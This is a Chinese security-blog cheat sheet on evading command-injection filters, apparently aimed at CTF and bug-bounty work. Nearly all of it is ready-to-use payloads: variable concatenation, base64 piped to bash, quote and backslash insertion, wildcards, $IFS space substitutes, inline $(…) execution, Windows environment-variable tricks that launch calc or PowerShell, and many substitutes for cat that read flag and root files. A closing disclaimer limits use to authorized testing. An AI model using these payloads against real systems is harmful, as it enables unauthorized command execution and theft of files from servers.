拼接绕过
a=ca; b=t;c=flag; $a$b $c.php
cat flag.php编码绕过
echo "Y2F0IGZsYWcucGhw" | base64 -d|bash
`echo "Y2F0IGZsYWcucGhw"| base64 -d`
cat flag.php单双引号
ca""t fl''ag.php
cat flag.php反斜杠
ca\t fl\ag.php
cat flag.php可变扩展绕过
c\at flag.???
cat flag.phpshell特殊变量
ca$@t fl$@ag.php
cat flag.php
Windows(通配符绕过)
powershell c:\*\system32\c??c.exe@^p^o^w^e^rshell c:\*\system32\c??c.exe 弹计算器*表示一串字符串,?表示一个字符
换行执行命令
ca\
t
fl
ag长度限制绕过
cat flag.php > a
sh a空格绕过
linux
cat$IFSflag.php
或cat$IFS$flag.php
或cat${IFS}flag.php
或cat${IFS}$flag.php
cat<>flag.php
或cat<flag.php
cat%09falg.php(需要php环境)windows
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP![图片[1]-【SRC技巧】优雅地进行命令执行绕过-渗透云记 - 专注于网络安全与技术分享](https://b.encenc.com/wp-content/uploads/2024/01/20240105221639541-image.png)
内敛执行绕过
echo "xxx `cat flag.php"
或
echo "xxx$(cat flag.php)"过滤了指定的命令
more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
sh /flag 2>%261 //报错出文件内容
curl file:///root/f/flag
strings flag
uniq -c flag
bash -v flag
rev flag
所有姿势都可连用并不是只能用那一种姿势,可多种姿势结合使用
原文地址:http://www.yuque.com/besilent/null/vr0ws7zma4cx3gr2
© 版权声明
渗透云记的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
渗透云记拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客,即表示您已经知晓并接受了此声明通告。详情见本站的“免责声明”如果有侵权之处请第一时间联系我们删除。敬请谅解!E-mail:admin@encenc.com
THE END
请登录后查看评论内容